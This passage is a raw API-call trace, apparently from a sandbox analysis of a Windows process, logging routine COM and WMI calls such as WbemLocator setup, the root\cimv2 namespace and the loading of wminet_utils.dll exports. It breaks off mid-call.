WbemDefPath:IUnknown:QueryInterface (in: This=0x63aee0, riid=0x7fffa7cf6958*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ab9e3e0 | out: ppvObject=0x1ab9e3e0*=0x0) returned 0x80004002 [0197.341] WbemDefPath:IUnknown:Release (This=0x63aee0) returned 0x2 [0197.341] WbemDefPath:IUnknown:Release (This=0x63aee0) returned 0x1 [0197.344] SetEvent (hEvent=0x2e8) returned 1 [0204.884] CoGetClassObject (in: rclsid=0x618158*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fffa7d19540*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1ab9e920 | out: ppv=0x1ab9e920*=0x67cd30) returned 0x0 [0204.884] WbemDefPath:IUnknown:QueryInterface (in: This=0x67cd30, riid=0x7fffa7d3e650*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1ab9e968 | out: ppvObject=0x1ab9e968*=0x0) returned 0x80004002 [0204.884] WbemDefPath:IClassFactory:CreateInstance (in: This=0x67cd30, pUnkOuter=0x0, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ab9e918 | out: ppvObject=0x1ab9e918*=0x67d3c0) returned 0x0 [0204.884] WbemDefPath:IUnknown:Release (This=0x67cd30) returned 0x0 [0204.884] WbemDefPath:IUnknown:QueryInterface (in: This=0x67d3c0, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ab9e728 | out: ppvObject=0x1ab9e728*=0x67d3c0) returned 0x0 [0204.885] WbemDefPath:IUnknown:QueryInterface (in: This=0x67d3c0, riid=0x7fffa7cf6928*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1ab9e7d0 | out: ppvObject=0x1ab9e7d0*=0x0) returned 0x80004002 [0204.885] WbemDefPath:IUnknown:QueryInterface (in: This=0x67d3c0, riid=0x7fffa7cf6978*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x1ab9dfd8 | out: ppvObject=0x1ab9dfd8*=0x0) returned 0x80004002 [0204.885] WbemDefPath:IUnknown:AddRef (This=0x67d3c0) returned 0x3 [0204.885] WbemDefPath:IUnknown:QueryInterface (in: This=0x67d3c0, riid=0x7fffa7cf6938*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1ab9de78 | out: ppvObject=0x1ab9de78*=0x0) returned 0x80004002 [0204.885] WbemDefPath:IUnknown:QueryInterface (in: This=0x67d3c0, riid=0x7fffa7cf6948*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1ab9de00 | out: ppvObject=0x1ab9de00*=0x0) returned 0x80004002 [0204.885] WbemDefPath:IUnknown:QueryInterface (in: This=0x67d3c0, riid=0x7fffa7cf5da0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ab9ddf0 | out: ppvObject=0x1ab9ddf0*=0x67c890) returned 0x0 [0204.885] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x67c890, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1ab9de18 | out: pCid=0x1ab9de18*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0204.885] WbemDefPath:IUnknown:Release (This=0x67c890) returned 0x3 [0204.885] CoGetContextToken (in: pToken=0x1ab9dea0 | out: pToken=0x1ab9dea0) returned 0x0 [0204.885] CoGetContextToken (in: pToken=0x1ab9e320 | out: pToken=0x1ab9e320) returned 0x0 [0204.885] WbemDefPath:IUnknown:QueryInterface (in: This=0x67d3c0, riid=0x7fffa7cf6958*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ab9e3e0 | out: ppvObject=0x1ab9e3e0*=0x0) returned 0x80004002 [0204.885] WbemDefPath:IUnknown:Release (This=0x67d3c0) returned 0x2 [0204.885] WbemDefPath:IUnknown:Release (This=0x67d3c0) returned 0x1 [0204.886] SetEvent (hEvent=0x3fc) returned 1 [0206.405] CoGetClassObject (in: rclsid=0x618158*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fffa7d19540*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1ab9e920 | out: ppv=0x1ab9e920*=0x67ca70) returned 0x0 [0206.406] WbemDefPath:IUnknown:QueryInterface (in: This=0x67ca70, riid=0x7fffa7d3e650*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1ab9e968 | out: ppvObject=0x1ab9e968*=0x0) returned 0x80004002 [0206.406] WbemDefPath:IClassFactory:CreateInstance (in: This=0x67ca70, pUnkOuter=0x0, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ab9e918 | out: ppvObject=0x1ab9e918*=0x67e980) returned 0x0 [0206.406] WbemDefPath:IUnknown:Release (This=0x67ca70) returned 0x0 [0206.406] WbemDefPath:IUnknown:QueryInterface (in: This=0x67e980, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ab9e728 | out: ppvObject=0x1ab9e728*=0x67e980) returned 0x0 [0206.406] WbemDefPath:IUnknown:QueryInterface (in: This=0x67e980, riid=0x7fffa7cf6928*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1ab9e7d0 | out: ppvObject=0x1ab9e7d0*=0x0) returned 0x80004002 [0206.406] WbemDefPath:IUnknown:QueryInterface (in: This=0x67e980, riid=0x7fffa7cf6978*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x1ab9dfd8 | out: ppvObject=0x1ab9dfd8*=0x0) returned 0x80004002 [0206.407] WbemDefPath:IUnknown:AddRef (This=0x67e980) returned 0x3 [0206.407] WbemDefPath:IUnknown:QueryInterface (in: This=0x67e980, riid=0x7fffa7cf6938*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1ab9de78 | out: ppvObject=0x1ab9de78*=0x0) returned 0x80004002 [0206.407] WbemDefPath:IUnknown:QueryInterface (in: This=0x67e980, riid=0x7fffa7cf6948*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1ab9de00 | out: ppvObject=0x1ab9de00*=0x0) returned 0x80004002 [0206.407] WbemDefPath:IUnknown:QueryInterface (in: This=0x67e980, riid=0x7fffa7cf5da0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ab9ddf0 | out: ppvObject=0x1ab9ddf0*=0x67cbb0) returned 0x0 [0206.407] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x67cbb0, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1ab9de18 | out: pCid=0x1ab9de18*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0206.407] WbemDefPath:IUnknown:Release (This=0x67cbb0) returned 0x3 [0206.407] CoGetContextToken (in: pToken=0x1ab9dea0 | out: pToken=0x1ab9dea0) returned 0x0 [0206.407] CoGetContextToken (in: pToken=0x1ab9e320 | out: pToken=0x1ab9e320) returned 0x0 [0206.407] WbemDefPath:IUnknown:QueryInterface (in: This=0x67e980, riid=0x7fffa7cf6958*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ab9e3e0 | out: ppvObject=0x1ab9e3e0*=0x0) returned 0x80004002 [0206.407] WbemDefPath:IUnknown:Release (This=0x67e980) returned 0x2 [0206.407] WbemDefPath:IUnknown:Release (This=0x67e980) returned 0x1 [0206.407] SetEvent (hEvent=0x408) returned 1 [0209.356] CoGetClassObject (in: rclsid=0x618158*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fffa7d19540*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1ab9e920 | out: ppv=0x1ab9e920*=0x67c850) returned 0x0 [0209.356] WbemDefPath:IUnknown:QueryInterface (in: This=0x67c850, riid=0x7fffa7d3e650*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1ab9e968 | out: ppvObject=0x1ab9e968*=0x0) returned 0x80004002 [0209.356] WbemDefPath:IClassFactory:CreateInstance (in: This=0x67c850, pUnkOuter=0x0, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ab9e918 | out: ppvObject=0x1ab9e918*=0x67ebc0) returned 0x0 [0209.356] WbemDefPath:IUnknown:Release (This=0x67c850) returned 0x0 [0209.356] WbemDefPath:IUnknown:QueryInterface (in: This=0x67ebc0, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ab9e728 | out: ppvObject=0x1ab9e728*=0x67ebc0) returned 0x0 [0209.356] WbemDefPath:IUnknown:QueryInterface (in: This=0x67ebc0, riid=0x7fffa7cf6928*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1ab9e7d0 | out: ppvObject=0x1ab9e7d0*=0x0) returned 0x80004002 [0209.356] WbemDefPath:IUnknown:QueryInterface (in: This=0x67ebc0, riid=0x7fffa7cf6978*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x1ab9dfd8 | out: ppvObject=0x1ab9dfd8*=0x0) returned 0x80004002 [0209.357] WbemDefPath:IUnknown:AddRef (This=0x67ebc0) returned 0x3 [0209.357] WbemDefPath:IUnknown:QueryInterface (in: This=0x67ebc0, riid=0x7fffa7cf6938*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1ab9de78 | out: ppvObject=0x1ab9de78*=0x0) returned 0x80004002 [0209.357] WbemDefPath:IUnknown:QueryInterface (in: This=0x67ebc0, riid=0x7fffa7cf6948*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1ab9de00 | out: ppvObject=0x1ab9de00*=0x0) returned 0x80004002 [0209.357] WbemDefPath:IUnknown:QueryInterface (in: This=0x67ebc0, riid=0x7fffa7cf5da0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ab9ddf0 | out: ppvObject=0x1ab9ddf0*=0x1afb7a60) returned 0x0 [0209.357] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1afb7a60, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1ab9de18 | out: pCid=0x1ab9de18*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0209.357] WbemDefPath:IUnknown:Release (This=0x1afb7a60) returned 0x3 [0209.357] CoGetContextToken (in: pToken=0x1ab9dea0 | out: pToken=0x1ab9dea0) returned 0x0 [0209.357] CoGetContextToken (in: pToken=0x1ab9e320 | out: pToken=0x1ab9e320) returned 0x0 [0209.357] WbemDefPath:IUnknown:QueryInterface (in: This=0x67ebc0, riid=0x7fffa7cf6958*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ab9e3e0 | out: ppvObject=0x1ab9e3e0*=0x0) returned 0x80004002 [0209.358] WbemDefPath:IUnknown:Release (This=0x67ebc0) returned 0x2 [0209.358] WbemDefPath:IUnknown:Release (This=0x67ebc0) returned 0x1 [0209.358] SetEvent (hEvent=0x420) returned 1 Thread: id = 94 os_tid = 0x16e4 Thread: id = 95 os_tid = 0x77c Thread: id = 96 os_tid = 0xe5c Thread: id = 97 os_tid = 0x1380 [0197.781] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0197.781] RoInitialize () returned 0x1 [0197.781] RoUninitialize () returned 0x0 [0197.782] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x1af9ee78 | out: lpiid=0x1af9ee78) returned 0x0 [0197.783] CoGetClassObject (in: rclsid=0x66a018*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fffa7d19540*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1af9ea50 | out: ppv=0x1af9ea50*=0x65d760) returned 0x0 [0197.801] WbemLocator:IUnknown:QueryInterface (in: This=0x65d760, riid=0x7fffa7d3e650*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1af9ea98 | out: ppvObject=0x1af9ea98*=0x0) returned 0x80004002 [0197.801] WbemLocator:IClassFactory:CreateInstance (in: This=0x65d760, pUnkOuter=0x0, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1af9ea48 | out: ppvObject=0x1af9ea48*=0x65d780) returned 0x0 [0197.801] WbemLocator:IUnknown:Release (This=0x65d760) returned 0x0 [0197.802] WbemLocator:IUnknown:QueryInterface (in: This=0x65d780, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1af9e858 | out: ppvObject=0x1af9e858*=0x65d780) returned 0x0 [0197.802] WbemLocator:IUnknown:QueryInterface (in: This=0x65d780, riid=0x7fffa7cf6928*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1af9e900 | out: ppvObject=0x1af9e900*=0x0) returned 0x80004002 [0197.802] WbemLocator:IUnknown:QueryInterface (in: This=0x65d780, riid=0x7fffa7cf6978*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x1af9e108 | out: ppvObject=0x1af9e108*=0x0) returned 0x80004002 [0197.802] WbemLocator:IUnknown:AddRef (This=0x65d780) returned 0x3 [0197.802] WbemLocator:IUnknown:QueryInterface (in: This=0x65d780, riid=0x7fffa7cf6938*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1af9dfa8 | out: ppvObject=0x1af9dfa8*=0x0) returned 0x80004002 [0197.802] WbemLocator:IUnknown:QueryInterface (in: This=0x65d780, riid=0x7fffa7cf6948*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1af9df30 | out: ppvObject=0x1af9df30*=0x0) returned 0x80004002 [0197.802] WbemLocator:IUnknown:QueryInterface (in: This=0x65d780, riid=0x7fffa7cf5da0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1af9df20 | out: ppvObject=0x1af9df20*=0x0) returned 0x80004002 [0197.802] CoGetContextToken (in: pToken=0x1af9dfd0 | out: pToken=0x1af9dfd0) returned 0x0 [0197.803] CoGetObjectContext (in: riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x665738 | out: ppv=0x665738*=0x61b170) returned 0x0 [0197.805] CoGetContextToken (in: pToken=0x1af9e450 | out: pToken=0x1af9e450) returned 0x0 [0197.805] WbemLocator:IUnknown:QueryInterface (in: This=0x65d780, riid=0x7fffa7cf6958*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1af9e510 | out: ppvObject=0x1af9e510*=0x0) returned 0x80004002 [0197.805] WbemLocator:IUnknown:Release (This=0x65d780) returned 0x2 [0197.805] WbemLocator:IUnknown:Release (This=0x65d780) returned 0x1 [0197.806] CoGetContextToken (in: pToken=0x1af9f000 | out: pToken=0x1af9f000) returned 0x0 [0197.806] CoGetContextToken (in: pToken=0x1af9ef00 | out: pToken=0x1af9ef00) returned 0x0 [0197.807] WbemLocator:IUnknown:QueryInterface (in: This=0x65d780, riid=0x1af9f060*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1af9f030 | out: ppvObject=0x1af9f030*=0x65d780) returned 0x0 [0197.807] WbemLocator:IUnknown:AddRef (This=0x65d780) returned 0x3 [0197.807] WbemLocator:IUnknown:Release (This=0x65d780) returned 0x2 [0197.880] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x63aee0, puCount=0x1af9f430 | out: puCount=0x1af9f430*=0x2) returned 0x0 [0197.880] WbemDefPath:IWbemPath:GetText (in: This=0x63aee0, lFlags=8, puBuffLength=0x1af9f428*=0x0, pszText=0x0 | out: puBuffLength=0x1af9f428*=0xf, pszText=0x0) returned 0x0 [0197.880] WbemDefPath:IWbemPath:GetText (in: This=0x63aee0, lFlags=8, puBuffLength=0x1af9f428*=0xf, pszText="00000000000000" | out: puBuffLength=0x1af9f428*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x1af9dd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", lpFilePart=0x0) returned 0x30 [0197.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\\\wminet_utils.dll", cchWideChar=65, lpMultiByteStr=0x1af9e310, cbMultiByte=67, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\\\wminet_utils.dllåù\x1a", lpUsedDefaultChar=0x0) returned 65 [0197.898] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\\\wminet_utils.dll") returned 0x7fffad180000 [0197.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResetSecurity", cchWideChar=13, lpMultiByteStr=0x1af9e350, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResetSecurity", lpUsedDefaultChar=0x0) returned 13 [0197.974] GetProcAddress (hModule=0x7fffad180000, lpProcName="ResetSecurity") returned 0x7fffad184310 [0197.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetSecurity", cchWideChar=11, lpMultiByteStr=0x1af9e350, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetSecurity§ÿ\x7f", lpUsedDefaultChar=0x0) returned 11 [0197.990] GetProcAddress (hModule=0x7fffad180000, lpProcName="SetSecurity") returned 0x7fffad184390 [0198.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServices", cchWideChar=18, lpMultiByteStr=0x1af9e340, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServices\x1e\x02", lpUsedDefaultChar=0x0) returned 18 [0198.003] GetProcAddress (hModule=0x7fffad180000, lpProcName="BlessIWbemServices") returned 0x7fffad182840 [0198.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServicesObject", cchWideChar=24, lpMultiByteStr=0x1af9e340, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServicesObject\x90\x81n§ÿ\x7f", lpUsedDefaultChar=0x0) returned 24 [0198.335] GetProcAddress (hModule=0x7fffad180000, lpProcName="BlessIWbemServicesObject") returned 0x7fffad182900 [0198.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyHandle", cchWideChar=17, lpMultiByteStr=0x1af9e340, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyHandle¹\x1e\x02", lpUsedDefaultChar=0x0) returned 17 [0198.536] GetProcAddress (hModule=0x7fffad180000, lpProcName="GetPropertyHandle") returned 0x7fffad1838c0 [0198.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WritePropertyValue", cchWideChar=18, lpMultiByteStr=0x1af9e340, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WritePropertyValue\x1e\x02", lpUsedDefaultChar=0x0) returned 18 [0198.687] GetProcAddress (hModule=0x7fffad180000, lpProcName="WritePropertyValue") returned 0x7fffad184650 [0198.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x1af9e350, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone", lpUsedDefaultChar=0x0) returned 5 [0198.700] GetProcAddress (hModule=0x7fffad180000, lpProcName="Clone") returned 0x7fffad1829c0 [0198.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VerifyClientKey", cchWideChar=15, lpMultiByteStr=0x1af9e340, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VerifyClientKey", lpUsedDefaultChar=0x0) returned 15 [0198.711] GetProcAddress (hModule=0x7fffad180000, lpProcName="VerifyClientKey") returned 0x7fffad184530 [0198.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetQualifierSet", cchWideChar=15, lpMultiByteStr=0x1af9e340, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetQualifierSet", lpUsedDefaultChar=0x0) returned 15 [0198.793] GetProcAddress (hModule=0x7fffad180000, lpProcName="GetQualifierSet") returned 0x7fffad183a40 [0198.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Get", cchWideChar=3, lpMultiByteStr=0x1af9e350, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Get\x02", lpUsedDefaultChar=0x0) returned 3 [0198.796] GetProcAddress (hModule=0x7fffad180000, lpProcName="Get") returned 0x7fffad183480 [0198.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 